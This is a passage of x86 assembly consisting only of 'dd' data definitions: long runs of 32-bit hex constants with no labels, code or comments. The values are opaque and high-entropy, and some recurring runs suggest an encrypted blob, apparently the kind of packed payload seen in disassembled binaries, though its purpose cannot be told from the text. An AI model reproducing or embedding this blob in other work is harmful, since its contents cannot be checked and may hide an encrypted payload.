8BDBEE1Ah, 0C3EC2872h, 111F2BD5h dd 236B95D3h, 52E4C511h, 0B7C41432h, 0CE193B7Eh, 120E1586h dd 2E4084C2h, 7CB4C817h, 0ABDF0015h, 0C22C2877h, 314474B3h dd 0F75B8D8h, 6EAECB1Fh, 9CA80C30h, 0CE32356Bh, 70168B6h dd 5D65ABD2h, 78BDD107h, 0B2E3717Fh, 0CF197B7Eh, 15555AB3h dd 5E4FD5C7h, 6BBDE71Ah, 0BEC9395Fh, 0FA2B3963h, 0F5748A6h dd 7F61BDEBh, 6FB4F30Bh, 889C2853h, 0FE3C4167h, 0E7271A3h dd 524EA8F6h, 0FF8DFC0Bh, 9FEC0075h, 0C7145C9Bh, 225889ABh dd 5B998E96h, 88BAF034h, 0C7FA0E47h, 0C51448BDh, 365F8BA3h dd 53BDABFDh, 9283911Fh, 0AFFF0B5Eh, 0C6394483h, 294793ACh dd 4E80A0E3h, 0F381E335h, 0DBED366Ah, 0F93A4CBEh, 165D83DFh dd 5391F08Ah, 98D9E000h, 0D2CE336Dh, 0C8544482h, 154E88CAh dd 5289D5EFh, 82C8F533h, 0B7C53670h, 0ED356DA5h, 2C739BE6h dd 1B9BC6E7h, 84DBF31Eh, 80F33E7Fh, 0D255FD4h, 1B1891C1h dd 7287DE0Ch, 0D1830E39h, 0DB042C58h, 0F2D46E2h, 227888E8h dd 6194D93Bh, 0ABD91B2Fh, 0AB393677h, 3130748Dh, 1775B1C3h dd 0FB9C41Fh, 0BECD1911h, 0DE27417Eh, 1E2579A9h, 5A61B0F2h dd 629ECA26h, 0BEF01452h, 0F6705867h, 1F5D64B8h, 4C6DBCF4h dd 6E92C721h, 85A00856h, 0EA184B6Fh, 77969B3h, 3767BEF2h dd 77B9EF3Dh, 0A3F52F53h, 0EF263567h, 125E658Fh, 4150B9E9h dd 93A5EF0Fh, 0B8FD0257h, 0F20F5EAAh, 177EFDA4h, 4E99BBD5h dd 928EF016h, 89940442h, 0F6126E8Eh, 0F498DA7h, 4E9BAAE0h dd 0B9C4E22Dh, 0A6E21E5Eh, 0DF395D97h, 3E4B9AB0h, 5FB1B2FDh dd 0B0B4C35Ah, 0CBED3C54h, 0E83D7697h, 394B98CAh, 6084F38Ah dd 9BDDEC24h, 0DEFB0047h, 0E826719Ch, 205388D9h, 5298F786h dd 82EEF533h, 0D1CB267Bh, 0F73378B9h, 4F7286DFh, 6BA7C1CCh dd 8EF2EF2Bh, 0FD802876h, 1A3C5692h, 246AB5DCh, 6497D41Dh dd 86DB121Eh, 0DB324978h, 152D65ADh, 337784FDh, 138EC213h dd 0ADFC0D08h, 0C81D317Dh, 52D47AAh, 2F71A8DEh, 60B1CC3Bh dd 95A80C30h, 0C201107Ah, 1D0974A8h, 527EB6C0h, 64B1D113h dd 0BCCB2550h, 0ED70536Fh, 64E5EA2h, 525EB0D6h, 66A1D51Ch dd 0BEC52056h, 9F154B69h, 3E547180h, 5867B8F0h, 7783F80Eh dd 0A8F20044h, 0F5295A56h, 136768BDh, 546EA4E8h, 0BE9FCE66h dd 0B9F91161h, 9714448Ah, 105F91A9h, 4C93BAF3h, 0FBBCF009h dd 0A9FA0E4Dh, 93144E9Fh, 37589CA1h, 498CB6FDh, 9AA5FF27h dd 0A6E25D4Fh, 0FC5C5F95h, 5B4C9BA7h, 4C97AEFDh, 0BAC0F93Fh dd 0CDE92D48h, 0C82C409Ch, 32579ED2h, 479EDCC2h, 0A6BCEC3Ah dd 0C9ED214Ch, 0C0204480h, 3C6399DFh, 7C89D7E8h, 0B8DCE026h dd 0D2F0306Ah, 0F73E54EAh, 2A729BD3h, 7E98FAF6h, 0AEB4C020h dd 0C1E53974h, 30387C88h, 1E7680C2h, 17A5DD0Ch, 86C41303h dd 0DB192764h, 1F2970B0h dd 227888E8h, 45A4EC7Ah, 0ECE52907h, 0E73C6B20h, 12161192h dd 2C7C9ECDh, 6A97CC05h, 0BEFA753Bh, 0C2040E69h, 0A2546B4h dd 3F4DA1E3h, 5ABFC020h, 0AED6144Bh, 0D61C5C5Ch, 2E444CB3h dd 5C6D87A2h, 51A0C43Dh, 0B6D5015Bh, 9F2D4143h, 1CE3684h dd 0BC52879Ch, 51D1F7BEh, 99841BC9h, 0A418A0FDh, 0A3BF01F8h dd 63569BCCh, 0E7BC6630h, 0F046F0CDh, 53E731C8h, 6BF2A3DAh dd 0D4B54496h, 93995D49h, 2F94612Eh, 90446177h, 5A46F9ACh dd 41AB95C3h, 0A7081A5Bh, 97C089A1h, 0DD0D699Ch, 5DBD0A91h dd 0A4F4F7B2h, 663F819Eh, 0BFBA6528h, 4850E171h, 6C306433h dd 0EAC3BDBCh, 87EE893Ch, 0BBBA5512h, 0D605E565h, 270ADD0h dd 0DF6FA1ECh, 0E5D2D15Ah, 0B511AE4Eh, 502BD6h, 9D2FC972h dd 82E77507h, 0BF6E768Ch, 0E4438F39h, 0BEA4E6D5h, 44E71A4Dh dd 17E414FAh, 0EAD82D4Ah, 247C4966h, 0F0487F36h, 2F548B62h dd 13F0AD7Ah, 0B5FE7B2Ch, 0DB712D12h, 772E11DEh, 0BC408EFBh dd 39E75FE3h, 24F12A42h, 914F079Bh, 7BF88DAh, 438152D7h dd 0E8D89367h, 0D731FC32h, 0A0700B1Ah, 906F5E07h, 0D98D5E70h dd 8AD49755h, 0D38796B5h, 6047D106h, 0EEB3FA2Dh, 3732EA64h dd 2B9812E7h, 0D5746936h, 1097CAFDh, 510FE74Bh, 7C8F409Ah dd 17CC994Eh, 34679A3Bh, 0AC8EB475h, 0A3B5FDFCh, 0A071E9E2h dd 0FBC8BD3Eh, 386A95C6h, 61E5A605h, 0DA2CCFFDh, 0A6F3B152h dd 0F7ECF8D1h, 3D4FB52Ah, 48D7D609h, 0B37D369Dh, 27F4C18Eh dd 0E32D0C07h, 8C8C6F3Dh, 16DDA83Bh, 624C7A0h, 73A1ECDEh dd 7A43D807h, 0BBBE6E50h, 78702569h, 651BAB2Fh, 1B2EE486h dd 0EB50D052h, 0EA84511Eh, 986FF06Bh, 0B076E980h, 0E2200Fh dd 0B5E48178h, 0B3A46DD7h, 0BBCF19CCh, 0CEDF83BEh, 17D2AA2Eh dd 66775D87h, 0AF4A5244h, 7B6215C6h, 5D7E22F3h, 13E94522h dd 9D217946h, 6286EF73h, 1E87E1ABh, 752CBD3Fh, 758AC76h dd 4E21374Ah, 0A7427D6Eh, 2683EF2Dh, 3F0CD94Eh, 0E659F872h dd 0D7926AA7h, 9F14A081h, 13BF09E0h, 3408DD86h, 7D418EAh dd 0DB4CEC3Ah, 0CB6C3904h, 6B3901BAh, 0AD912E9Eh, 88D0AB51h dd 0EB18E4CAh, 9B683406h, 8F346B9Eh, 3300CD9Eh, 0FF9ECB30h dd 5D0D9A65h, 0A46407C5h, 67A77003h, 7EFCC997h, 0AACAFF33h dd 0C7FC6044h, 0C1202DFAh, 644E6C39h, 0AE6EC5A4h, 0A79FE5A8h dd 0C294357Eh, 700B29F6h, 5908D176h, 0B20BC18Eh, 0F3F6B118h dd 0CB4CDC7Fh, 0DB4CC6E4h, 574E2535h, 75A7ECD8h, 0D4661CA9h dd 3ED15514h, 0D184542Eh, 68667845h, 4861B9B0h, 81EFD716h dd 2009095Ah, 83501CEEh, 25DCDA1Dh, 0B01BEC92h, 0B7E4D11Eh dd 0E1D01D4Ah, 44268C19h, 8F99E584h, 17E4B376h, 0EB9409B5h dd 934EDCE9h, 841B15D4h, 7128D33Bh, 1722F07Ah, 0D592F946h dd 203E4467h, 41516953h, 0CE093EAAh, 39CCA9E3h, 8D797642h dd 67F093F1h, 725F85D5h, 0BB03D9A6h, 0BD8A462h, 0A29E4FBEh dd 9DF07B1Ah, 6EB806D6h, 0BB08D5A3h, 0F6A18150h, 839EEC7Ch dd 0EA2B774Fh, 0ADF78E90h, 1C4BD0D8h, 3BACCA4h, 30CF3F67h dd 0AD541F97h, 0A60F58CEh, 33DF4895h, 7A419966h, 0CBAE7BA3h dd 9B0C3194h, 3330FDCAh, 56936C5h, 0C6C8A35Eh, 0C7946122h dd 93DFA8F5h, 0EEC5F9C6h, 0AAF8C592h, 0BE96C160h, 6615527Ch dd 0C5C29F6h, 6784FD04h, 0BE70CE83h, 0CFC08D5Ah, 137F2C06h dd 0E571FCEh, 5724F132h, 3D0B027h, 0CE81A976h, 0CEFC3045h dd 0A7688D91h, 2DA191CFh, 6B849979h, 6AC9F026h, 8DF45260h dd 0EB2532C5h, 4FE3AE70h, 0B52848Dh, 10B48169h, 267F1FF8h dd 7F7A222Ch, 1B482581h, 1E0CE12Eh, 0A7B07D4Ah, 0C3123E79h dd 7B2C748Dh, 7B2E7451h, 0D365AD4Ch, 169F4F32h, 971CC09Bh dd 1F1511E8h, 0C310DFAAh, 5F8AF827h, 0E796E0BDh, 32F94138h dd 73761649h, 6BC5EAF6h, 5A8AF523h, 0A5318E6Fh, 24700B31h dd 0FAC32DD2h, 3B3EEEE4h, 8A546296h, 0D3967851h, 0F5AFC007h dd 94396FD3h, 33772EADh, 0BE508895h, 0CFAA293Eh, 1E364103h dd 546E750Eh, 80D04641h, 0C39C9A6Dh, 0D62FD0BFh, 2DEF31C8h dd 6330FCC6h, 2EF4431Dh, 3CB9562h, 4CF4AA05h, 0F2C6DE31h dd 0BD6BFCB2h, 0A8D62E67h, 7C979E99h, 171B0AE6h, 0CF367DA6h dd 0A442A793h, 1BF25471h, 7E4B8D6Ch, 0BFBA625Ch, 0A054E171h dd 50CD7271h, 239ABA4Dh, 0A03589BEh, 0F4DB9621h, 0C60375A8h dd 1E7CA8E8h, 709EDAEFh, 9FDEEA21h, 0D9ED0642h, 0F027728Eh dd 3D69AAEAh, 6F86D0F0h, 94C6E418h, 0EFEE2273h, 133C61A3h dd 397D97DDh, 6585E57Eh, 0ABC4182Dh, 0AF083A79h, 2B4815E0h dd 4714E1AEh, 7783DF13h, 0BAC50368h, 0C7086B74h, 340D5FDEh dd 337BFDE1h, 60A6D111h, 8EA21E2Dh, 8726045Dh, 3A0F47B8h dd 492AF9E8h, 7EACD71Bh, 0D74C2434h, 0FE703D0Ah, 719FE457h dd 0BECED594h, 7E2B405h, 4D35923Ah, 5E6C0F3Dh, 574C1A3Ah dd 828FCFF4h, 3E6A63Ch, 0E1A0C56Fh, 1A0E1F77h, 1229FEF0h dd 69BD40B9h, 74CCAF5Ah, 6ECF6744h, 12E99498h, 6306CA1Bh dd 180B4C19h, 72329554h, 89189B68h, 92D1D604h, 3EC73624h dd 0D403DA7Ah, 0D3B812A1h, 96E55922h, 0CF54AC30h, 0B328F5F4h dd 27F4C186h, 0DD83CB09h, 0BFC01562h, 0B0F2B00Dh, 972FF188h dd 4963AAFEh, 7A43DA54h, 0BBBE6E70h, 8F20E16Bh, 13286844h dd 0CF13B9B0h, 153C6DC1h, 0BC6CAEE1h, 0D0501DEAh, 43AAF0h dd 57AC9BD1h, 724B8102h, 0B3B676B0h, 80B2700Eh, 0BEF60D4Dh dd 9A1B4E81h, 0E3866F9Bh, 2AF18025h, 7B7E55E6h, 1645B0FFh dd 42B1FC2Ah, 0E40AECB9h, 0A0904524h, 224411DEh, 704298F9h dd 43988744h, 4E57750Eh, 0A7427AA4h, 73400732h, 4F7FAEA6h dd 7FB6CC00h, 87A43058h, 9822A8F5h, 0EAB509E0h, 3B3EEEF8h dd 8A599061h, 0D396744Bh, 0A30CBC8Fh, 946905E4h, 13F7B0Bh dd 7B80E6Ah, 429C6936h, 0AD714BB7h, 0DAB958CEh, 3336F1DCh dd 39368Eh, 4E5F03CDh, 97522F94h, 0C6B3ADCAh, 2FCAD7FAh dd 0D15D1862h, 97945730h, 0F96147AEh, 5D44ABC6h, 0D478C592h dd 0C1F8DBCBh, 9950D82Ah, 2D10B83h, 5B1EEB9Fh, 0AAF2ABDCh dd 0C5DEE7EFh, 0EFDA0D26h, 740A74A2h, 6118BF2Bh, 0B60FE58Ah dd 0EF8AB510h, 85EFD0E4h, 6F5421D8h, 5320EDB6h, 5CA3EAD1h dd 0C58AB619h, 0B7C81D5Ah, 0B8FA8815h, 278FE980h, 1BE8B585h dd 0FF6134C3h, 3ED94D2Ch, 49700F5Bh, 0BE320DB2h, 1B0C4E81h dd 0B4B07D4Ah, 0E135075Fh, 3F6641A7h, 0B814ADE2h, 25DB07EFh dd 0D06CFC46h, 0AB7A7096h, 722C82DEh, 0CE10DDAAh, 39C5BAC3h dd 66252C42h, 0A7427D3Ch, 8CB4FE32h, 9B15A59h, 0BD8934Eh dd 0D5B4F531h, 4FF13D0Ah, 6F3C0846h, 3A09BDF6h, 922BA16Eh dd 0D396512Ch, 9EFCFD87h, 0E06805D2h, 6504BB4Ah, 3FE60895h dd 0F196900h, 0F365405Bh, 67341246h, 8CA5865h, 1D279950h dd 0D5F4D8B1h, 0E26431C8h, 13B570E3h, 7FFCFF88h, 0C7EA009Dh dd 7116118h, 92E9A9F5h, 1FA7F9C6h, 0D4F84E9Eh, 9B411E6Eh dd 5906B34h, 0B9624E73h, 5B42F4C2h, 259EC0E4h, 0CFEE18A5h dd 470F5910h, 0EBDC2A0Dh, 0C424F1BFh, 3D982807h, 0FFD68960h dd 2E770670h, 87621DF0h, 0D62F2D3Fh, 1FECB8C6h, 0F53A38DFh dd 0BF355128h, 7CAA3402h, 4F888149h, 30B6B582h, 0C38008A8h dd 1115B24Eh, 0F24C2FDDh, 7D06750Fh, 0FFE5007Eh, 1C4F8740h dd 0B101DC9Bh, 7B2215D4h dd 4714F5C6h, 0ECB3FF7Ah, 0E99053D3h, 8F3CC812h, 73D19CCAh dd 1310EBEAh, 84D61F79h, 1ABC5106h, 0ED7649EEh, 710A1FDBh dd 340F93B4h, 8BD08136h, 37657EDFh, 0E77B6C02h, 5DC319F2h dd 53B558F2h, 0EFD49752h, 0D3A06D26h, 0E75A1723h, 45182BF2h dd 1221EBBEh, 7BE8B34Fh, 0EABC1113h, 0D4223F71h, 67144F87h dd 699532CDh, 7ECCAF5Dh, 0CB98C9F6h, 0C7645BFEh, 0F6CFAE9Dh dd 2FCAF5BCh, 0EE4C18E9h, 0C7FE6118h, 5A0B3619h, 5AC4A8CBh dd 0DF8C592h, 0F7CEF57Bh, 9905A27Dh, 0C5C1FCDh, 0B078F906h dd 27F3A985h, 4E4D8D5Ah, 0BFBA47B0h, 1EA776A5h, 5712CD94h dd 778E7D0Fh, 0D3D43CDBh, 1E0B5514h, 8762346Ah, 34AD60BAh dd 34EC8FB8h, 0BAB8EF9Ch, 227B0248h, 836621CCh, 311C1135h dd 0E56324ADh, 0DBDC34C3h, 0BE304D2Ch, 6F39B714h, 0B10F0DD2h dd 65854E81h, 6EB99E5Dh, 45974861h, 0B563DA69h, 7B7C5C23h dd 0B713AD4Ch, 66478EC1h, 0B1EDBA41h, 0F74427E2h, 7505B617h dd 25A8A876h, 0DBDD452Ah, 6DE1BE0Eh, 0F3403BE1h, 932BE1Bh dd 1AACA572h, 0C9C8F4F9h, 0A3703D3Ch, 0EAFA09D6h, 3B3EEBC5h dd 0F9DC486Eh, 566792C5h, 9F5A2C72h, 0EB3805D2h, 370013C3h dd 239F9767h, 0A1F30658h, 0BB0E5A22h, 25268A2h, 134FEDBBh dd 9AA1F012h, 0EBF71112h, 0F208549Dh, 17518FA8h, 25F1E8F3h dd 0DBE8B542h, 0B4B42E0Eh, 0F60D408Fh, 3E4BD9B4h, 459DA1E0h dd 0A5CE9C7Fh, 0ADF5314Fh, 0FC394582h, 7B5199B1h, 5784A0E6h dd 9DA1AD23h, 0C7E97942h, 0FF3B4082h, 7B509FDFh, 4284CEAAh dd 81D5ED38h, 96A86F45h, 0E6032BE3h, 3A488ECEh, 7ECCDEE8h dd 8F98E93Eh, 0D6A4287Fh, 0ED707984h, 3B748EDFh, 748E95AEh dd 95D2A13Ch, 0D7EE2873h, 5F053995h, 3F7184C5h, 40EEBC44h dd 86C21822h, 0CA0E2836h, 0E276CC2h, 3572C182h, 778EC813h dd 9C8C4635h, 8A1D287Dh, 573058FEh, 3730AEC3h, 2EB9C41Fh dd 0FCDC3C62h, 0C618617Dh, 776168AEh, 3C3C1E22h, 84977108h dd 7F6319A6h, 8A3C9FABh, 0C02CAFC2h, 3B68BBDDh, 5B1C3EA2h dd 816201F6h, 4FB481B5h, 4B8127B6h, 371AB2DDh, 3D09D6Ah dd 0CF9C6936h, 9B683502h, 673401CEh, 3300CD9Ah, 0FFCC9966h dd 0CB986532h, 976431FEh, 6330FDCAh, 2FFCC996h, 0FBC89562h dd 0C794612Eh, 93602DFAh, 5F2CF9C6h, 2BF8C592h, 0F7C4915Eh dd 0C3905D2Ah, 8F5C29F6h, 5B28F5C2h, 27F4C18Eh, 93C08D5Ah dd 8058FCA5h, 85825C4h, 611B291Bh, 94FFBD8Ah, 0BC319D15h dd 0F03F5A3Ah, 0C8422E8h, 7804C9FEh, 69EB5C4h, 98B0C769h dd 0A3C6DA0Ah, 0A5C5FC1h, 79233D23h, 0C36D3C82h, 0CB4B771h dd 9B42CE1Fh, 0BD2DC004h, 0CE90E5B6h, 17D29518h, 0E3B019A2h dd 0AF5C2116h, 0FEC515E2h, 4722C23Dh, 67F89423h, 0DB6CFA4Ah dd 2E87B2F0h, 77722E6Ah, 40C92A69h, 39F8CFFBh, 24B89642h dd 0A7FBBD7Eh, 9144E559h, 0AC915050h, 88D89351h, 0D2D07104h dd 0D1730F21h, 937284C6h, 0B8568EFAh, 3A0A154h, 0D04B5FC5h dd 777C4BF9h, 94C7FA85h, 0BA2F1FB5h, 3E6A2B2h, 0FBD76A6Eh dd 23EDBAC1h, 0A03437F1h, 53F791Fh, 0FFCC9966h, 0CBA48D32h dd 12EF31FEh, 6306C27Eh, 0D00A5F7Eh, 0FBD07D9Dh, 7A17612Eh dd 9356124Eh, 0D6248CC6h, 1DDCCA0Fh, 8587A5Eh, 0F5AFE9A7h dd 0AD3EAF6h, 5B1ECA7Ah, 18405407h, 0F0288D6Ch, 8C8C5926h dd 18D3E63Bh, 5724F13Eh, 0DD1D55D8h, 7ABF76A9h, 0BBBE6AFAh dd 0FDD7F7EDh, 0D72FEDB6h, 1FECB881h, 0EBA8FFD1h, 0B779D511h dd 0C1DB1DEAh, 87F4B9BAh, 18174A7Ch, 0D18B59CBh, 0E3464E1Ah dd 86CC116Ch, 0CB0191B2h, 14909F87h, 6841960Ah, 4EFD485Eh dd 0A497CA3Dh, 0B50182Fh, 0FF95AD36h, 5C64521Fh, 2477BFEBh dd 77441169h, 0BD685CCCh, 8AD39B45h, 0DBA875E9h, 0A74EC258h dd 39CB08AFh, 0B40E32B6h, 5A29A678h, 285A03D6h, 7BC53EF5h dd 0C23C3FE9h, 0C0701527h, 7502561h, 665F6D3Ah, 9F5A06DEh dd 956DED82h, 0B2072E61h, 3E6A2B2h, 0F044ECB9h, 9F6B3534h dd 0A7B752EAh, 3CDBFE98h, 0ED2F91D0h, 98B8ACB2h, 9340153Fh dd 4A14E1E3h, 6FA7ED9Ah, 497C89h, 1A2FB621h, 68E1138Eh dd 8442BC6Eh, 0D079F3E6h, 865AA07h, 3811735Eh, 23E90B20h dd 0A0A9D3B6h, 0D4AC281Dh, 841932Eh, 4CD4B05Bh, 70D93386h dd 0B601CEF8h, 0D871B3FEh, 0E99B666h, 2E775356h, 87621E56h dd 0AC5104E1h, 9CB24679h, 4519190h, 747BAEE0h, 0DB5477EBh dd 0B0E9DF5Eh, 5B7D3D7Dh, 81B4B768h, 0B1987CA2h, 7CA8D904h dd 0E07E07B0h, 0FFBCB714h, 1C4F8851h, 28748B95h, 234D7F33h dd 0B8E1EF46h, 101A2D85h, 8F1C7235h, 8D38C010h, 9CEE11E8h dd 1B78B78Dh, 0C2629DCh, 0CA186D37h, 5880AFE6h, 7341B525h dd 0ED88D9A6h, 0EB09A806h, 214FBBC0h, 0A3C838E1h, 0C4BC09D6h dd 0B6CB6A40h, 31EC11FBh, 2477463Ah, 1A9BFADCh, 6B0E3D77h dd 3F04D19Eh, 0C2100865h, 4A6A62D6h, 9B5E0DA1h, 13274CFh dd 0D8254497h, 5C496F75h, 0C998530Ah, 9A02378Bh, 67DBD8FBh dd 0AFDC4F0h, 47203E04h, 4C6B9ED1h, 6E919B9h, 5F1AC60Ah dd 0AE0F0639h, 0F7F2A9FBh, 0CB905D2Ah, 8B9CBCF9h, 0C7C05F7Eh dd 0AE0B3E71h, 0C5FF5DCFh, 1C09AF26h, 8A5813CAh, 662BF5CBh dd 0E3DBBF61h, 6A4B4AFDh, 0BBBE6D87h, 8F5421EEh, 0D6AACACEh dd 1FDA8119h, 8DB36593h, 0D1C1DA13h, 29A8AD41h, 77836C3Ch dd 0FB29B5B4h, 83D38455h, 802B4B93h, 94E77F26h, 0C47C5DA0h dd 9D4FB17Bh, 0D588E2CFh, 6E244D16h, 0B8E30D02h, 67FF1D1Eh dd 130B151Ch, 0C647D220h, 43204178h, 88BBE221h, 82C2D927h dd 0ABAA196h, 70CEB5CBh, 37C442E5h, 2B426770h, 0C0FF3F4Eh dd 7F0A218Dh, 8FAC1B0Ch, 5C83E7E2h, 1DF6F729h, 0C5CDA161h dd 0F91DD5A4h, 2D7B19F0h, 61604DCCh, 95347118h, 8708A554h dd 0B31D7693h, 7F5582CBh, 2BADDEF7h, 0A4F5EA36h, 0BB07017h dd 7A3B9950h, 0CBAE5D97h, 176431FEh, 380FEBEh, 8A793E3Ch dd 0FBC8A35Ah, 0B39C612Eh, 183595FDh, 1087F92Ah, 135D4065h dd 0F7C79168h, 479F5C2Ah, 8F5C2921h, 0F0821D72h, 18487C07h dd 1B708D6Ch, 205F28Ch, 8B6E1A32h, 6F817449h, 23F3BDBCh dd 0FAC88956h, 832DD0D5h, 875421D8h, 5654ECBAh, 0E012786Eh dd 415135ADh, 0B01DAB5h, 8502BD5h, 0C6D4C279h, 2DD7713Fh dd 1BFC084Eh, 4CE42AA2h, 0BF7FB2D0h, 0CEEF4ED4h, 17D289DBh dd 0E3B07D49h, 2A8A4762h, 7B7E2D41h, 0AF11952Eh, 0EC1F5338h dd 56C81EFEh, 6B4BEE34h, 0F2B3BAB8h, 4326E50Fh, 0FDCA975h dd 5E5E2036h, 0A74279ADh, 9B45785Ah, 0C0F327B8h, 0F425019Ah dd 3F84C1C1h, 5C8FC6BCh, 0D75A3035h, 906EC05Dh, 925F0AFFh dd 0D396559Fh, 5D9BEBF1h, 6B3805D1h, 49ECC5EBh, 0B32F6297h dd 340C8129h, 230ECAFDh, 0CC521431h, 0FC8B660Bh, 0C0081CEDh dd 3B36504h, 60987977h, 5508584Fh, 2FFCCA96h, 0CE6E162h dd 0F1ACC4ABh, 93602DFAh, 0A80E8DC0h, 1DC06017h, 0F7C4915Eh dd 2B95282Bh, 70A3D404h, 638D7035h, 27F4C1B8h, 0F6B4895Ah dd 407254CEh, 2EDDD20Dh, 5324C786h, 57F0BD8Ah, 11DB6141h dd 9230AADDh, 2C9CDF2Eh, 27E0E502h, 6A541282h, 40DF6EAAh dd 8F21D4E9h, 83581DDCh, 69E9B6h, 234B0802h, 93B48178h dd 4DBBA55Ch, 56F4E619h, 41D1CCAAh, 21DC2EDBh, 0E054BD4Ah dd 97E3EC1Ch, 0CBE315D4h dd 0C29E4B1Fh, 13D695D9h, 0D5ECC9ECh, 9D40DA97h, 0CF22BBDEh dd 0C6E72048h, 0FEA91D3h, 0DBA87552h, 0EEC4467Ah, 6F86B70h dd 8FA7BF5Ah, 0CBEB0F9Ah, 7F19F895h, 54700B35h, 5904AC53h dd 3B08F5A2h, 0B7DDD46Eh, 4E256762h, 356C0F3Eh, 0ABB9BDB4h dd 0FA15469h, 3909D5Ch, 0CCE86936h, 9140F182h, 510C9C6Bh dd 0BAABAB9Ah, 0C9F335DBh, 4E6FCE32h, 9752095Bh, 2330FDCAh dd 7F4CC0E3h, 0C3551060h, 303E6118h, 0A558887Fh, 5F2C79C6h dd 9BF3B092h, 69419BE6h, 69906B12h, 373A141Dh, 0DEDFEDF3h dd 27C2F92Bh, 0F3C08C5Ah, 963C5B52h, 0B3C680F8h, 0B3E4F188h dd 0BD55B789h, 89BCBF6Eh, 3A303389h, 22D1D61Eh, 5320DB82h dd 6AECB984h, 0E1703150h, 81BCCFBBh, 0AFB7BEAh, 7923210Bh dd 33580D82h, 101F814Eh, 85B8E89Fh, 7F4C11E6h, 0A36991B2h dd 0E81B4C4Fh, 0DB15F8BDh, 0AB7C4920h, 703D15E2h, 0C21E591Eh dd 13D695E5h, 28E192ECh, 9D40E097h, 774C11DEh, 2501A8AAh dd 53C2ACEh, 0ED90EAE7h, 94DF270Eh, 66ABA71Ah, 272561C0h dd 33470078h, 33647108h, 3CD53709h, 93C3FEEh, 9E8D2209h dd 7D49756h, 0B5A06D2Ah, 0EBACB8BEh, 63FC85D1h, 0F9B7494h dd 0A8B69D5Ch, 6C19DF39h, 3068033Ah, 98C8C126h, 96853A65h dd 0FFCCAF5Eh, 0BFD86532h, 953481F7h, 5508604Fh, 0AA0B6396h dd 0FBFEADC7h, 0C794412Eh, 9115AB4Ah, 10A1FDC2h, 0B65D4F6Ch dd 7EC4A766h, 0F5AFEDA7h, 0FF74FF6h, 5C5DF03Eh, 6874C13Eh dd 1B6ACDA5h, 4073A55Fh, 0B3FDA005h, 1724F188h, 9B96BD8Ah dd 0EDC9B830h, 10EE7C96h, 25E395Eh, 5316D525h, 0B5EF5946h dd 1444D1BAh, 400CE1E1h, 0B568B86Fh, 4F9CE9B6h, 0ABEAC082h dd 7A110BC8h, 0D5807B22h, 7AB0994Dh, 4BA8E2C7h, 571BFEFEh dd 1F9B95E0h, 2A8BB6E9h, 7B7E2D47h, 4715E1AEh, 5350A60Fh dd 0E731FC4Ch, 40D24524h, 0F4FC77D1h, 0DEB5D76Ah, 69DC9F4Eh dd 71A9C5E9h, 9FD1C4F9h, 73400DECh, 1079D9A4h, 337D2085h dd 0D7A47108h, 0B9053D0Eh, 0EA36C966h, 3B3EED3Dh, 3F7004E4h dd 33616D0Ch, 0F9D45F16h, 6B88AE53h, 77B4D975h, 3B4F1860h dd 38366900h, 0AD509087h, 6F3401CEh, 5510B89Ah, 0F5241ADEh dd 0FDA0FB97h, 27CF57FEh, 0D33816CBh, 0B179C3DEh, 51C8A35Ah dd 0FF31E4D9h, 93602DCCh, 2A9DF9D6h, 939EE0E7h, 52CE69DDh dd 0C3A665B4h, 4F6F8290h, 0EB95DC68h, 0D0F4F7B1h, 0C5F828DFh dd 9F8C5926h, 3A4750F2h, 313F1AC9h, 29E8B432h, 0D98417F3h dd 0B86C9522h, 0BFCA84E4h, 0F846ED8Ch, 205C04AFh, 2A328564h dd 8834F494h, 28361DDCh, 0CA1EB106h, 1BDE8D1Fh, 423176E4h dd 0B0807B22h, 0B4D19E6h, 0EE9D1290h, 17E48746h, 96B47D4Ah dd 0AF9BE00h, 7B4823DAh, 3217E1AEh, 0E964457Fh, 744486B9h dd 5C87BAE8h, 417CB45Bh, 4310DDAAh, 0BFDFDD7Eh, 5E5FDF8Bh dd 0A74279ABh, 0F3400DDAh, 38BCF9D2h, 33452058h, 37657108h dd 0ABF93010h, 0CA3E09F2h, 3B3EED3Fh, 87D745AEh, 630B69FEh dd 270A9367h, 0CE32E52Dh, 3732E903h, 8627360Ch, 0CFAA5193h dd 9B683522h, 0E2C352BAh, 3336F53Fh, 0DFCC9966h, 0C6F6846h dd 976431FDh, 0F380F8BEh, 0A40F223Ch, 53451EA5h, 0EC945711h dd 6F21A43Bh, 0DA26A176h, 2BCEFD0Fh, 524166F4h, 0C3906B12h dd 0FB5C69F6h, 0B9093CEh, 0BA71CB4Dh, 18C0BB62h, 40343F2Ch dd 16FD2F12h, 3124C786h, 86754A21h, 0ECBCBF6Eh, 0CF895522h dd 22D1D69Dh, 5320DB82h, 6BCCB986h, 0E87F725Fh, 0C384511Eh dd 29C0ADEFh, 80971A5Dh, 24283009h, 2F9F8178h, 807C0593h dd 0DAC9EE2Fh, 4B18D38Ah, 62E4317Eh, 7E35F044h, 257C7F2Eh dd 82C855EAh, 0CAEC92ADh, 37A4607Eh, 3F6D7956h, 0F3F51Ah dd 0CF22173Dh, 0E8761D9Bh, 8F531110h, 0DBA8CD2Ah, 0C195430Eh dd 0F6EB5571h, 590AAC6Fh, 6D1894CAh, 7D67C195h, 9BC0B887h dd 0EACB09E0h, 3B3EED07h, 17D4A16Eh, 0F8F76B4Fh, 868761FEh dd 40105659h, 0BCD4FA66h, 35EF55E7h, 67096836h, 9A68033Dh dd 43708AF7h, 54BD449Eh, 74CCAF76h, 0FDA7C98Fh, 3FE11AFEh dd 9430CBF5h, 19C46C13h, 0FBC8D562h, 3096152Eh, 97A28622h dd 0DC7BAFC6h, 1DC7252Fh, 73CB915Eh, 0C3905CF3h, 8F5C241Eh dd 96DBEC2h, 14B884C0h, 0BF84A368h, 2A73596Ah, 8B6E1E60h dd 68D07437h, 0A8A3BDBCh, 37BFB50Eh, 30A026DDh, 67BC15ADh dd 0D8DF124Fh, 29D36D13h, 0A9BBDE52h, 4F01D812h, 80502BD5h dd 0CA95E1F4h, 1BDE8A7Eh, 189CF2C5h, 0B380CDA9h, 8AF5F1E6h dd 0F6931A4Dh, 17D28EAAh, 161D951Ch, 3AF7B6E9h, 7B7E2A36h dd 441CAB25h, 0DDCBA130h, 0D0A990C5h, 0AB79259Ah, 2DC01EDEh dd 4010DDABh, 39E371C3h, 431D7642h, 0B747731h, 0F64FE5E6h dd 3F0CD904h, 20DCE3FFh, 0E19BE9BBh, 0F3763E0Ah, 90C9633Eh dd 0EFB5565Dh, 7D49751h, 949B664Fh, 84EF360Ah, 803805D3h dd 0E391E892h, 0CD0AB55h, 0CF9D64B3h, 3ED3602h, 13437F1h dd 16FFF51Bh, 0FF301C69h, 8B136532h, 